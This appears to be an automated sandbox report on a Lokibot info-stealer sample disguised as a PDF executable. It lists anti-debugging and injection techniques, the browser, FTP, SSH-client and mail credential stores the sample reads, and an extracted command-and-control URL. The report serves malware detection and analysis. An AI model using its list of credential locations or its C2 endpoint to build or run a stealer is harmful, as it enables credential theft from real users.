Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F5401F BlockInput
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F15BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4C95 LoadLibraryA,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F19922 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Enables debug privileges
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F0A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F0A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F0A2A4 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Section loaded: unknown target: C:\Users\user\Desktop\scan0098788_pdf.exe protection: execute and read and write
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F38A73 LogonUserW
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F44CFA mouse_event
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Process created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Contains functionality to add an ACL to a security descriptor
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F381D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Contains functionality to create a new security descriptor
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F44A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
May try to detect the Windows Explorer process (often used for injection)
Source: scan0098788_pdf.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: scan0098788_pdf.exe | Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F087AB cpuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00F15007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Contains functionality to query the account / user name
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F2215F GetUserNameW
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 2_2_00F140BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Contains functionality to query windows version
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: 0_2_00EE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: scan0098788_pdf.exe PID: 1044, type: MEMORY
Source: Yara match | File source: Process Memory Space: scan0098788_pdf.exe PID: 4860, type: MEMORY
Source: Yara match | File source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.db
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txt
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: PopPassword | 3_2_0040D069
Source: C:\Users\user\Desktop\scan0098788_pdf.exe | Code function: SmtpPassword | 3_2_0040D069
OS version to string mapping found (often used in BOTs)
Source: scan0098788_pdf.exe | Binary or memory string: WIN_81
Source: scan0098788_pdf.exe | Binary or memory string: WIN_XP
Source: scan0098788_pdf.exe | Binary or memory string: WIN_XPe
Source: scan0098788_pdf.exe | Binary or memory string: WIN_VISTA
Source: scan0098788_pdf.exe | Binary or memory string: WIN_7
Source: scan0098788_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: scan0098788_pdf.exe | Binary or memory string: WIN_8

Malware Configuration

Threatname: Lokibot

{"c2:": "http://108.170.31.41/dozlogs/logs/fre.php"}

Behavior Graph
